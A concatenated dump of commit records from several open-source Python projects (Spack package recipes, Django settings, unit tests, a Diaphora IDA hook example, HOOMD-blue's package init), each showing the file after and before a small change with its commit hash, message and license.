TIME_BETWEEN_INDEX_REBUILDS = 60 * 30 # seconds
#Tastypie throttle settings
THROTTLE_AT = 100 #Throttle requests after this number in below timeframe
THROTTLE_TIMEFRAME= 60 * 60 #Timeframe in which to throttle N requests, seconds
THROTTLE_EXPIRATION= 24 * 60 * 60 # When to remove throttle entries from cache, seconds
with open(os.path.join(ENV_ROOT,"env.json")) as env_file:
ENV_TOKENS = json.load(env_file)
with open(os.path.join(ENV_ROOT, "auth.json")) as auth_file:
AUTH_TOKENS = json.load(auth_file)
DATABASES = AUTH_TOKENS.get('DATABASES', DATABASES)
CACHES = AUTH_TOKENS.get('CACHES', CACHES)
AWS_ACCESS_KEY_ID = AUTH_TOKENS.get('AWS_ACCESS_KEY_ID', AWS_ACCESS_KEY_ID)
AWS_SECRET_ACCESS_KEY = AUTH_TOKENS.get('AWS_SECRET_ACCESS_KEY', AWS_SECRET_ACCESS_KEY)
USE_S3_TO_STORE_MODELS = ENV_TOKENS.get('USE_S3_TO_STORE_MODELS', USE_S3_TO_STORE_MODELS)
S3_BUCKETNAME = ENV_TOKENS.get('S3_BUCKETNAME', S3_BUCKETNAME)
BROKER_URL = AUTH_TOKENS.get('BROKER_URL', BROKER_URL)
CELERY_RESULT_BACKEND = AUTH_TOKENS.get('CELERY_RESULT_BACKEND', CELERY_RESULT_BACKEND)
ELB_HOSTNAME = ENV_TOKENS.get('ELB_HOSTNAME', None)
EMAIL_BACKEND = ENV_TOKENS.get('EMAIL_BACKEND', EMAIL_BACKEND)
if ELB_HOSTNAME is not None:
ALLOWED_HOSTS += [ELB_HOSTNAME] | agpl-3.0 | Python |
6ac28c1daa0173ae5baa66c9cb020e9c673973ff | Add info for [email protected] (#5452) | EmreAtes/spack,tmerrick1/spack,lgarren/spack,EmreAtes/spack,lgarren/spack,iulian787/spack,krafczyk/spack,TheTimmy/spack,tmerrick1/spack,mfherbst/spack,TheTimmy/spack,krafczyk/spack,mfherbst/spack,TheTimmy/spack,TheTimmy/spack,tmerrick1/spack,mfherbst/spack,mfherbst/spack,EmreAtes/spack,matthiasdiener/spack,skosukhin/spack,krafczyk/spack,tmerrick1/spack,LLNL/spack,iulian787/spack,mfherbst/spack,iulian787/spack,LLNL/spack,LLNL/spack,krafczyk/spack,iulian787/spack,EmreAtes/spack,EmreAtes/spack,TheTimmy/spack,skosukhin/spack,LLNL/spack,matthiasdiener/spack,matthiasdiener/spack,matthiasdiener/spack,skosukhin/spack,krafczyk/spack,lgarren/spack,skosukhin/spack,lgarren/spack,skosukhin/spack,matthiasdiener/spack,lgarren/spack,tmerrick1/spack,LLNL/spack,iulian787/spack | var/spack/repos/builtin/packages/lftp/package.py | var/spack/repos/builtin/packages/lftp/package.py | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Lftp(AutotoolsPackage):
"""LFTP is a sophisticated file transfer program supporting a number
of network protocols (ftp, http, sftp, fish, torrent)."""
homepage = "http://lftp.yar.ru/"
url = "http://lftp.yar.ru/ftp/lftp-4.7.7.tar.gz"
version('4.8.1', '419b27c016d968a0226b2e5df1454c22')
version('4.7.7', 'ddc71b3b11a1af465e829075ae14b3ff')
depends_on('expat')
depends_on('libiconv')
depends_on('ncurses')
depends_on('openssl')
depends_on('readline')
depends_on('zlib')
def configure_args(self):
return [
'--with-expat={0}'.format(self.spec['expat'].prefix),
'--with-libiconv={0}'.format(self.spec['libiconv'].prefix),
'--with-openssl={0}'.format(self.spec['openssl'].prefix),
'--with-readline={0}'.format(self.spec['readline'].prefix),
'--with-zlib={0}'.format(self.spec['zlib'].prefix),
'--disable-dependency-tracking',
]
| ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Lftp(AutotoolsPackage):
"""LFTP is a sophisticated file transfer program supporting a number
of network protocols (ftp, http, sftp, fish, torrent)."""
homepage = "http://lftp.yar.ru/"
url = "http://lftp.yar.ru/ftp/lftp-4.7.7.tar.gz"
version('4.7.7', 'ddc71b3b11a1af465e829075ae14b3ff')
depends_on('expat')
depends_on('libiconv')
depends_on('ncurses')
depends_on('openssl')
depends_on('readline')
depends_on('zlib')
def configure_args(self):
return [
'--with-expat={0}'.format(self.spec['expat'].prefix),
'--with-libiconv={0}'.format(self.spec['libiconv'].prefix),
'--with-openssl={0}'.format(self.spec['openssl'].prefix),
'--with-readline={0}'.format(self.spec['readline'].prefix),
'--with-zlib={0}'.format(self.spec['zlib'].prefix),
'--disable-dependency-tracking',
]
| lgpl-2.1 | Python |
e2be8a486c9d13f98d9f14ae7b0cddf8225cf1b3 | Add boolswitch test | mpsonntag/bulk-rename,mpsonntag/bulk-rename | test/test_apv_rename.py | test/test_apv_rename.py | """
Copyright (c) 2017, Michael Sonntag ([email protected])
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted under the terms of the BSD License. See
LICENSE file in the root of the project.
"""
import os
import shutil
import tempfile
import unittest
import uuid
from bren.bulk_rename import BulkRename
class RenameTest(unittest.TestCase):
def setUp(self):
dir_name = "bren_%s" % str(uuid.uuid1())
self.tmpdir = os.path.join(tempfile.gettempdir(), dir_name)
if not os.path.isdir(self.tmpdir):
os.makedirs(self.tmpdir)
for i in range(0, 3):
tmp_file = "tmpfile_%s.jpg" % i
open(os.path.join(self.tmpdir, tmp_file), 'a').close()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def test_tmp_files(self):
self.assertEqual(len(os.listdir(self.tmpdir)), 3)
def test_bool_switch(self):
self.assertEqual(BulkRename._bool_switch(1), True)
self.assertEqual(BulkRename._bool_switch(2), False)
| """
Copyright (c) 2017, Michael Sonntag ([email protected])
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted under the terms of the BSD License. See
LICENSE file in the root of the project.
"""
import os
import shutil
import tempfile
import unittest
import uuid
class RenameTest(unittest.TestCase):
def setUp(self):
dir_name = "bren_%s" % str(uuid.uuid1())
self.tmpdir = os.path.join(tempfile.gettempdir(), dir_name)
if not os.path.isdir(self.tmpdir):
os.makedirs(self.tmpdir)
for i in range(0, 3):
tmp_file = "tmpfile_%s.jpg" % i
open(os.path.join(self.tmpdir, tmp_file), 'a').close()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def test_tmp_files(self):
self.assertEqual(len(os.listdir(self.tmpdir)), 3)
| bsd-3-clause | Python |
59faede78ad5d763c7c9fa1763e3e7cac67c1ca6 | Move Circle inside CxDeriv | rparini/cxroots,rparini/cxroots | cxroots/CxDerivative.py | cxroots/CxDerivative.py | from __future__ import division
import numpy as np
from numpy import inf, pi
import scipy.integrate
import math
def CxDeriv(f, contour=None):
"""
Compute derivaive of an analytic function using Cauchy's Integral Formula for Derivatives
"""
if contour is None:
from cxroots.Contours import Circle
C = lambda z0: Circle(z0, 1e-3)
else:
C = lambda z0: contour
def df(z0, n):
integrand = lambda z: f(z)/(z-z0)**(n+1)
return C(z0).integrate(integrand) * math.factorial(n)/(2j*pi)
return np.vectorize(df)
| from __future__ import division
import numpy as np
from numpy import inf, pi
import scipy.integrate
import math
from cxroots.Contours import Circle, Rectangle
def CxDeriv(f, contour=None):
"""
Compute derivaive of an analytic function using Cauchy's Integral Formula for Derivatives
"""
if contour is None:
C = lambda z0: Circle(z0, 1e-3)
else:
C = lambda z0: contour
def df(z0, n):
integrand = lambda z: f(z)/(z-z0)**(n+1)
return C(z0).integrate(integrand) * math.factorial(n)/(2j*pi)
return np.vectorize(df)
| bsd-3-clause | Python |
2df7947f02fd39e05bf18a89f904e273d17c63ca | add v0.9.29 (#23606) | LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack | var/spack/repos/builtin/packages/lmdb/package.py | var/spack/repos/builtin/packages/lmdb/package.py | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Lmdb(MakefilePackage):
"""Symas LMDB is an extraordinarily fast, memory-efficient database we
developed for the Symas OpenLDAP Project. With memory-mapped files, it
has the read performance of a pure in-memory database while retaining
the persistence of standard disk-based databases."""
homepage = "https://lmdb.tech/"
url = "https://github.com/LMDB/lmdb/archive/LMDB_0.9.21.tar.gz"
version('0.9.29', sha256='22054926b426c66d8f2bc22071365df6e35f3aacf19ad943bc6167d4cae3bebb')
version('0.9.24', sha256='44602436c52c29d4f301f55f6fd8115f945469b868348e3cddaf91ab2473ea26')
version('0.9.22', sha256='f3927859882eb608868c8c31586bb7eb84562a40a6bf5cc3e13b6b564641ea28')
version('0.9.21', sha256='1187b635a4cc415bb6972bba346121f81edd996e99b8f0816151d4090f90b559')
version('0.9.16', sha256='49d7b40949f2ced9bc8b23ea6a89e75471a1c9126537a8b268c318a00b84322b')
build_directory = 'libraries/liblmdb'
@property
def install_targets(self):
return ['prefix={0}'.format(self.prefix), 'install']
@run_after('install')
def install_pkgconfig(self):
mkdirp(self.prefix.lib.pkgconfig)
with open(join_path(self.prefix.lib.pkgconfig, 'lmdb.pc'), 'w') as f:
f.write('prefix={0}\n'.format(self.prefix))
f.write('exec_prefix=${prefix}\n')
f.write('libdir={0}\n'.format(self.prefix.lib))
f.write('includedir={0}\n'.format(self.prefix.include))
f.write('\n')
f.write('Name: LMDB\n')
f.write('Description: Symas LMDB is an extraordinarily fast, '
'memory-efficient database.\n')
f.write('Version: {0}\n'.format(self.spec.version))
f.write('Cflags: -I${includedir}\n')
f.write('Libs: -L${libdir} -llmdb\n')
| # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Lmdb(MakefilePackage):
"""Symas LMDB is an extraordinarily fast, memory-efficient database we
developed for the Symas OpenLDAP Project. With memory-mapped files, it
has the read performance of a pure in-memory database while retaining
the persistence of standard disk-based databases."""
homepage = "https://lmdb.tech/"
url = "https://github.com/LMDB/lmdb/archive/LMDB_0.9.21.tar.gz"
version('0.9.24', sha256='44602436c52c29d4f301f55f6fd8115f945469b868348e3cddaf91ab2473ea26')
version('0.9.22', sha256='f3927859882eb608868c8c31586bb7eb84562a40a6bf5cc3e13b6b564641ea28')
version('0.9.21', sha256='1187b635a4cc415bb6972bba346121f81edd996e99b8f0816151d4090f90b559')
version('0.9.16', sha256='49d7b40949f2ced9bc8b23ea6a89e75471a1c9126537a8b268c318a00b84322b')
build_directory = 'libraries/liblmdb'
@property
def install_targets(self):
return ['prefix={0}'.format(self.prefix), 'install']
@run_after('install')
def install_pkgconfig(self):
mkdirp(self.prefix.lib.pkgconfig)
with open(join_path(self.prefix.lib.pkgconfig, 'lmdb.pc'), 'w') as f:
f.write('prefix={0}\n'.format(self.prefix))
f.write('exec_prefix=${prefix}\n')
f.write('libdir={0}\n'.format(self.prefix.lib))
f.write('includedir={0}\n'.format(self.prefix.include))
f.write('\n')
f.write('Name: LMDB\n')
f.write('Description: Symas LMDB is an extraordinarily fast, '
'memory-efficient database.\n')
f.write('Version: {0}\n'.format(self.spec.version))
f.write('Cflags: -I${includedir}\n')
f.write('Libs: -L${libdir} -llmdb\n')
| lgpl-2.1 | Python |
7abc503d6aa492f2340ab0b98d1f66892180ba19 | Fix some test error | thislight/wood,thislight/wood | tests/test_blueprint.py | tests/test_blueprint.py | from wood import Wood
from wood.support import Blueprint
def make_example_blueprint():
b = Blueprint()
b.empty(r"/example","example")
return b
def test_blueprint_can_add_empty_handler():
b = make_example_blueprint()
assert b != None
def test_blueprint_can_add_handlers_to_wood():
w = Wood()
b = make_example_blueprint()
b.to(w)
assert len(w.application.handlers) > 0
def test_blueprint_can_get_new_wood():
b = make_example_blueprint()
w = b.get_wood()
assert len(w.application.handlers) > 0
| from wood import Wood
from wood.support import Blueprint
def make_example_blueprint():
b = Blueprint()
b.empty(r"/example","example")
return b
def test_blueprint_can_add_empty_handler():
b = make_example_blueprint()
assert b != None
def test_blueprint_can_add_handlers_to_wood():
w = Wood()
b = make_example_blueprint()
b.to(w)
assert len(w.application.handlers) > 0
def test_blueprint_can_get_new_wood():
b = make_example_blueprint()
w.get_wood()
assert len(w.application.handlers) > 0
| apache-2.0 | Python |
d5438347980b4ed3f4a798b8c1019b87691f28bd | Bump version | walkr/oi,danbob123/oi | oi/version.py | oi/version.py | VERSION = '0.2.1'
| VERSION = '0.2.0'
| mit | Python |
676440a464d695146361eb1bdb684e121bf41a42 | fix simple_date parsing | lucuma/solution,jpscaletti/solution | solution/__init__.py | solution/__init__.py | # coding=utf-8
"""
=============================
Solution
=============================
An amazing form solution
:copyright: `Juan-Pablo Scaletti <http://jpscaletti.com>`_.
:license: MIT, see LICENSE for more details.
"""
from .form import Form # noqa
from .formset import FormSet # noqa
from .fields import * # noqa
from .validators import * # noqa
from .utils import Markup, get_html_attrs, to_unicode # noqa
__version__ = '5.2.6'
| # coding=utf-8
"""
=============================
Solution
=============================
An amazing form solution
:copyright: `Juan-Pablo Scaletti <http://jpscaletti.com>`_.
:license: MIT, see LICENSE for more details.
"""
from .form import Form # noqa
from .formset import FormSet # noqa
from .fields import * # noqa
from .validators import * # noqa
from .utils import Markup, get_html_attrs, to_unicode # noqa
__version__ = '5.2.5'
| mit | Python |
f6c6ff376974f604b2b4a7b62ad28fd56a264c55 | Add empty testing scaffolding. | sloede/pyglab,sloede/pyglab | test/test_exceptions.py | test/test_exceptions.py | #!/usr/bin/env python3
import pyglab.exceptions as ex
import unittest as ut
class TestBadRequest(ut.TestCase):
def test_throw(self):
pass
def test_statuscode(self):
pass
def test_message(self):
pass
def test_body(self):
pass
| #!/usr/bin/env python3
import pyglab.exceptions as ex
| mit | Python |
f13982144a2a0710af8e082dd01d73f036f026fd | Use clean_system fixture on pypackage test | takeflight/cookiecutter,0k/cookiecutter,terryjbates/cookiecutter,cichm/cookiecutter,letolab/cookiecutter,stevepiercy/cookiecutter,0k/cookiecutter,Vauxoo/cookiecutter,ramiroluz/cookiecutter,hackebrot/cookiecutter,tylerdave/cookiecutter,michaeljoseph/cookiecutter,nhomar/cookiecutter,dajose/cookiecutter,nhomar/cookiecutter,jhermann/cookiecutter,cichm/cookiecutter,Vauxoo/cookiecutter,moi65/cookiecutter,cguardia/cookiecutter,cguardia/cookiecutter,atlassian/cookiecutter,lucius-feng/cookiecutter,audreyr/cookiecutter,willingc/cookiecutter,agconti/cookiecutter,lgp171188/cookiecutter,vintasoftware/cookiecutter,jhermann/cookiecutter,sp1rs/cookiecutter,ramiroluz/cookiecutter,atlassian/cookiecutter,benthomasson/cookiecutter,drgarcia1986/cookiecutter,vincentbernat/cookiecutter,Springerle/cookiecutter,moi65/cookiecutter,foodszhang/cookiecutter,vincentbernat/cookiecutter,luzfcb/cookiecutter,terryjbates/cookiecutter,ionelmc/cookiecutter,benthomasson/cookiecutter,venumech/cookiecutter,pjbull/cookiecutter,willingc/cookiecutter,tylerdave/cookiecutter,drgarcia1986/cookiecutter,venumech/cookiecutter,dajose/cookiecutter,vintasoftware/cookiecutter,takeflight/cookiecutter,kkujawinski/cookiecutter,letolab/cookiecutter,ionelmc/cookiecutter,michaeljoseph/cookiecutter,christabor/cookiecutter,pjbull/cookiecutter,christabor/cookiecutter,kkujawinski/cookiecutter,sp1rs/cookiecutter,lucius-feng/cookiecutter,Springerle/cookiecutter,luzfcb/cookiecutter,agconti/cookiecutter,hackebrot/cookiecutter,audreyr/cookiecutter,lgp171188/cookiecutter,foodszhang/cookiecutter,janusnic/cookiecutter,stevepiercy/cookiecutter,janusnic/cookiecutter | tests/test_pypackage.py | tests/test_pypackage.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_pypackage
--------------
Tests formerly known from a unittest residing in test_generate.py named
TestPyPackage.test_cookiecutter_pypackage
"""
from __future__ import unicode_literals
import os
import subprocess
import pytest
from cookiecutter import utils
from tests.skipif_markers import skipif_travis, skipif_no_network
@pytest.fixture(scope='function')
def remove_additional_dirs(request):
"""
Remove special directories which are creating during the tests.
"""
def fin_remove_additional_dirs():
if os.path.isdir('cookiecutter-pypackage'):
utils.rmtree('cookiecutter-pypackage')
if os.path.isdir('boilerplate'):
utils.rmtree('boilerplate')
request.addfinalizer(fin_remove_additional_dirs)
@skipif_travis
@skipif_no_network
@pytest.mark.usefixtures('clean_system', 'remove_additional_dirs')
def test_cookiecutter_pypackage():
"""
Tests that https://github.com/audreyr/cookiecutter-pypackage.git works.
"""
proc = subprocess.Popen(
'git clone https://github.com/audreyr/cookiecutter-pypackage.git',
stdin=subprocess.PIPE,
shell=True
)
proc.wait()
proc = subprocess.Popen(
'cookiecutter --no-input cookiecutter-pypackage/',
stdin=subprocess.PIPE,
shell=True
)
proc.wait()
assert os.path.isdir('cookiecutter-pypackage')
assert os.path.isfile('boilerplate/README.rst')
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_pypackage
--------------
Tests formerly known from a unittest residing in test_generate.py named
TestPyPackage.test_cookiecutter_pypackage
"""
from __future__ import unicode_literals
import os
import subprocess
import pytest
from cookiecutter import utils
from tests.skipif_markers import skipif_travis, skipif_no_network
@pytest.fixture(scope='function')
def remove_additional_dirs(request):
"""
Remove special directories which are creating during the tests.
"""
def fin_remove_additional_dirs():
if os.path.isdir('cookiecutter-pypackage'):
utils.rmtree('cookiecutter-pypackage')
if os.path.isdir('boilerplate'):
utils.rmtree('boilerplate')
request.addfinalizer(fin_remove_additional_dirs)
@skipif_travis
@skipif_no_network
@pytest.mark.usefixtures('remove_additional_dirs')
def test_cookiecutter_pypackage():
"""
Tests that https://github.com/audreyr/cookiecutter-pypackage.git works.
"""
proc = subprocess.Popen(
'git clone https://github.com/audreyr/cookiecutter-pypackage.git',
stdin=subprocess.PIPE,
shell=True
)
proc.wait()
proc = subprocess.Popen(
'cookiecutter --no-input cookiecutter-pypackage/',
stdin=subprocess.PIPE,
shell=True
)
proc.wait()
assert os.path.isdir('cookiecutter-pypackage')
assert os.path.isfile('boilerplate/README.rst')
| bsd-3-clause | Python |
247e8f8ce8ed4677c629affec6b9a291c730e3a2 | Use assert_equal instead of assertEqual in fail testcase. | eerimoq/systest | tests/testcases/fail.py | tests/testcases/fail.py | from systest import TestCase
class FailTest(TestCase):
"""A test that always fails.
"""
count = 0
def __init__(self, name):
super(FailTest, self).__init__()
self.name = "fail_" + name
def run(self):
FailTest.count += 1
self.assert_equal(1, 0)
| from systest import TestCase
class FailTest(TestCase):
"""A test that always fails.
"""
count = 0
def __init__(self, name):
super(FailTest, self).__init__()
self.name = "fail_" + name
def run(self):
FailTest.count += 1
self.assertEqual(1, 0)
| mit | Python |
3c2d290452a07946880fc25af917b32766f9529d | Update test script to include deposit | c00w/BitToll,c00w/BitToll,c00w/BitToll,c00w/BitToll | testsuite/front_test.py | testsuite/front_test.py | #!/usr/bin/env python2
import gevent
import requests
import json
import time
import hashlib
ip_address = "vm"
port = "3000"
url = ''.join(['http://', ip_address, ':', port])
def secret(params, secret):
keys = params.keys()
keys.sort()
hash_str = ""
for key in keys:
hash_str += (params[key])
md5 = hashlib.md5()
md5.update(hash_str)
return md5.hexdigest()
def test_login(login):
info = login
assert 'username' in info
assert 'secret' in info
assert len(info.keys()) == 2
def pytest_funcarg__login(request):
r = requests.get(url + '/register')
assert r.status_code == 200
info = json.loads(r.text)
assert 'username' in info
assert 'secret' in info
return info
def test_balance(login):
body = {}
body['username'] = login['username']
body['time'] = str(time.time())
body['sign'] = secret(body, login['secret'])
r = requests.post(url + '/balance', data=json.dumps(body))
assert r.status_code == 200
info = json.loads(r.text)
assert 'balance' in info
def test_deposit(login):
body = {}
body['username'] = login['username']
body['time'] = str(time.time())
body['sign'] = secret(body, login['secret'])
r = requests.post(url + '/deposit', data=json.dumps(body), timeout=1)
assert r.status_code == 200
info = json.loads(r.text)
assert 'address' in info
r2 = requests.post(url + '/deposit', data=json.dumps(body), timeout=1)
assert r2.text == r.text
| #!/usr/bin/env python2
import gevent
import requests
import json
import time
import hashlib
ip_address = "vm"
port = "3000"
url = ''.join(['http://', ip_address, ':', port])
def secret(params, secret):
keys = params.keys()
keys.sort()
hash_str = ""
for key in keys:
hash_str += (params[key])
md5 = hashlib.md5()
md5.update(hash_str)
return md5.hexdigest()
def test_login(login):
info = login
assert 'username' in info
assert 'secret' in info
assert len(info.keys()) == 2
def pytest_funcarg__login(request):
r = requests.get(url + '/register')
assert r.status_code == 200
info = json.loads(r.text)
assert 'username' in info
assert 'secret' in info
return info
def test_balance(login):
body = {}
body['username'] = login['username']
body['time'] = str(time.time())
body['sign'] = secret(body, login['secret'])
r = requests.post(url + '/balance', data=json.dumps(body))
print r.text
assert r.status_code == 200
info = json.loads(r.text)
assert 'balance' in info
| mit | Python |
f6c0258e257aa537dbb64bb8c5f10c87ec32dcf9 | Update my_hooks.py | joxeankoret/diaphora | hooks/my_hooks.py | hooks/my_hooks.py | #!/usr/bin/python
"""
Example Diaphora export hooks script. In this example script the following fake
scenario is considered:
1) There is a something-user.i64 database, for user-land stuff.
2) There is a something-kernel.i64 database, for kernel-land stuff.
3) We export all functions from the something-user.i64 database.
4) We only export from something-kernel.i64 the syscall_* or sys_* prefixed
functions.
5) In both databases there are constants referencing the build identifier but
they are different for both databases: BUILD-1000 in the user-land part and
BUILD-2000 in the kernel-land part. For making a perfect match based on the
constants found in both databases, we change the strings BUILD-XXX to the
generic string "BUILD-ID" for both databases.
"""
#-----------------------------------------------------------------------
FUNC_PREFIXES = ["syscall_", "sys_"]
BUILD_IDS = ["BUILD-1000", "BUILD-2000"]
#-----------------------------------------------------------------------
class CMyHooks:
def __init__(self, diaphora_obj):
""" @diaphora_obj is the CIDABinDiff object being used.
"""
self.diaphora = diaphora_obj
self.db_name = self.diaphora.db_name
def before_export_function(self, ea, func_name):
""" @ea is the address of the function that is going to be read.
Return True for the function to be read, or False to ignore it.
"""
# If the IDB name has the word 'user' on it, it's the user-land database for
# which we want to export everything.
if self.db_name.find("user") > -1:
return True
# Otherwise, it's the kernel-land IDB for which we only want to export the
# syscall functions.
if func_name:
# Is it a syscall?
for prefix in FUNC_PREFIXES:
if func_name.startswith(prefix):
return True
return False
def after_export_function(self, d):
""" @d is a dictionary with everything exported by Diaphora for the current
function. Transformations can be applied to the dictionary like changing
some strings or constants or whatever else. The function must return a
new dictionary with the modifications.
"""
# Search if any of the constants in the dictionary has the string "BUILD-*"
# and, if so, change it in the export process to a generic "BUILD-ID" string
# that will match more functions.
for build_id in BUILD_IDS:
for key in d:
if type(d[key]) is str:
if d[key].find(build_id) > -1:
d[key] = d[key].replace(build_id, "GENERIC-BUILD-ID")
return d
HOOKS = {"DiaphoraHooks": CMyHooks}
| #!/usr/bin/python
"""
Example Diaphora export hooks script. In this example script the following fake
scenario is considered:
1) There is a something-user.i64 database, for user-land stuff.
2) There is a something-kernel.i64 database, for kernel-land stuff.
3) We export all functions from the something-user.i64 database.
4) We only export from something-kernel.i64 the syscall_* or sys_* prefixed
functions.
5) In both databases there are constants referencing the build identifier but
they are different for both databases: BUILD-1000 in the user-land part and
BUILD-2000 in the kernel-land part. For making a perfect match based on the
constants found in both databases, we change the strings BUILD-XXX to the
generic string "BUILD-ID" for both databases.
"""
#-----------------------------------------------------------------------
FUNC_PREFIXES = ["syscall_", "sys_"]
BUILD_IDS = ["BUILD-1000", "BUILD-2000"]
#-----------------------------------------------------------------------
class CMyHooks:
def __init__(self, diaphora_obj):
""" @diaphora_obj is the CIDABinDiff object being used.
"""
self.diaphora = diaphora_obj
self.db_name = self.diaphora.db_name
def before_export_function(self, ea, func_name):
""" @ea is the address of the function that is going to be read.
Return True for the function to be read, or False to ignore it.
"""
# If the IDB name has the word 'user' on it, it's the user-land database for
# which we want to export everything.
if self.db_name.find("user") > -1:
return True
# Otherwise, it's the kernel-land IDB for which we only want to export the
# syscall functions.
if func_name:
# It is a syscall
if "syscall_%s" % func_name in SYSCALL_NAMES:
return True
return False
def after_export_function(self, d):
""" @d is a dictionary with everything exported by Diaphora for the current
function. Transformations can be applied to the dictionary like changing
some strings or constants or whatever else. The function must return a
new dictionary with the modifications.
"""
# Search if any of the constants in the dictionary has the string "BUILD-*"
# and, if so, change it in the export process to a generic "BUILD-ID" string
# that will match more functions.
for build_id in BUILD_IDS:
for key in d:
if type(d[key]) is str:
if d[key].find(build_id) > -1:
d[key] = d[key].replace(build_id, "GENERIC-BUILD-ID")
return d
HOOKS = {"DiaphoraHooks": CMyHooks}
| agpl-3.0 | Python |
4ab33cec7c0f4ee9fee7a7dce1c28466780b7074 | Add hoomd.box.Box to main namespace | joaander/hoomd-blue,joaander/hoomd-blue,joaander/hoomd-blue,joaander/hoomd-blue,joaander/hoomd-blue,joaander/hoomd-blue | hoomd/__init__.py | hoomd/__init__.py | # Copyright (c) 2009-2019 The Regents of the University of Michigan
# This file is part of the HOOMD-blue project, released under the BSD 3-Clause
# License.
""" HOOMD-blue python API
:py:mod:`hoomd` provides a high level user interface for defining and executing
simulations using HOOMD.
.. rubric:: API stability
:py:mod:`hoomd` is **stable**. When upgrading from version 3.x to 3.y (y > x),
existing job scripts that follow *documented* interfaces for functions and
classes will not require any modifications.
**Maintainer:** Joshua A. Anderson
"""
# Maintainer: joaander
import sys;
import ctypes;
import os;
# need to import HOOMD with RTLD_GLOBAL in python sitedir builds
if not ('NOT_HOOMD_PYTHON_SITEDIR' in os.environ):
flags = sys.getdlopenflags();
sys.setdlopenflags(flags | ctypes.RTLD_GLOBAL);
from hoomd import _hoomd;
if not ('NOT_HOOMD_PYTHON_SITEDIR' in os.environ):
sys.setdlopenflags(flags);
from hoomd import meta
from hoomd import context
from hoomd import cite
from hoomd import analyze
from hoomd import benchmark
from hoomd import comm
from hoomd import compute
from hoomd import data
from hoomd import dump
from hoomd import group
from hoomd import init
from hoomd import integrate
from hoomd import option
from hoomd import update
from hoomd import util
from hoomd import variant
from hoomd import lattice
from hoomd import device
try:
from hoomd import md
except ImportError:
pass
try:
from hoomd import hpmc
except ImportError:
pass
try:
from hoomd import dem
except ImportError:
pass
# TODO: enable this import after updating MPCD to the new API
# try:
# from hoomd import mpcd
# except ImportError:
# pass
from hoomd.simulation import Simulation
from hoomd.state import State
from hoomd.operations import Operations
from hoomd.snapshot import Snapshot
from hoomd.logger import Logger
from hoomd.box import Box
from hoomd import tuner
from hoomd._hoomd import WalltimeLimitReached;
_default_excepthook = sys.excepthook;
## \internal
# \brief Override pythons except hook to abort MPI runs
def _hoomd_sys_excepthook(type, value, traceback):
_default_excepthook(type, value, traceback);
sys.stderr.flush();
if context.current.device is not None:
_hoomd.abort_mpi(context.current.device.cpp_exec_conf);
sys.excepthook = _hoomd_sys_excepthook
__version__ = "{0}.{1}.{2}".format(*_hoomd.__version__)
| # Copyright (c) 2009-2019 The Regents of the University of Michigan
# This file is part of the HOOMD-blue project, released under the BSD 3-Clause
# License.
""" HOOMD-blue python API
:py:mod:`hoomd` provides a high level user interface for defining and executing
simulations using HOOMD.
.. rubric:: API stability
:py:mod:`hoomd` is **stable**. When upgrading from version 3.x to 3.y (y > x),
existing job scripts that follow *documented* interfaces for functions and
classes will not require any modifications.
**Maintainer:** Joshua A. Anderson
"""
# Maintainer: joaander
import sys;
import ctypes;
import os;
# need to import HOOMD with RTLD_GLOBAL in python sitedir builds
if not ('NOT_HOOMD_PYTHON_SITEDIR' in os.environ):
flags = sys.getdlopenflags();
sys.setdlopenflags(flags | ctypes.RTLD_GLOBAL);
from hoomd import _hoomd;
if not ('NOT_HOOMD_PYTHON_SITEDIR' in os.environ):
sys.setdlopenflags(flags);
from hoomd import meta
from hoomd import context
from hoomd import cite
from hoomd import analyze
from hoomd import benchmark
from hoomd import comm
from hoomd import compute
from hoomd import data
from hoomd import dump
from hoomd import group
from hoomd import init
from hoomd import integrate
from hoomd import option
from hoomd import update
from hoomd import util
from hoomd import variant
from hoomd import lattice
from hoomd import device
try:
from hoomd import md
except ImportError:
pass
try:
from hoomd import hpmc
except ImportError:
pass
try:
from hoomd import dem
except ImportError:
pass
# TODO: enable this import after updating MPCD to the new API
# try:
# from hoomd import mpcd
# except ImportError:
# pass
